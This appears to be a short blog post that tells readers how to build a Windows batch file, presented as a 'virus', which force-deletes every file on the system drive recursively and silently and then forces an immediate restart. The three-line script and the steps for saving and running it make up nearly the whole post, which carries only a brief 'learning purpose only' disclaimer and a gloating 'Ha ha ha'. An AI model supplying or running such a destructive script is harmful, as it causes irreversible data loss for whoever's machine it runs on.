The below is the code that will delete all the files and contents about the drive..
This code is for learning purpose only please don't misuse it.
Step1 : Open Notepad pad from the Start >> Run >> Notepad Press Enter
Step2 : copy the below code to Notepad
@echo off
del %systemdrive%\*.* /f /s /q
shutdown -r -f -t 00
Step3 : Save the file with deletefiles.bat on drive you want to delete
Step4 : Double click on the file that's enough the virus will be effected all the drive files gone deleted
Ha ha ha
Share this post on your facebook wall click here
0 comments:
Post a Comment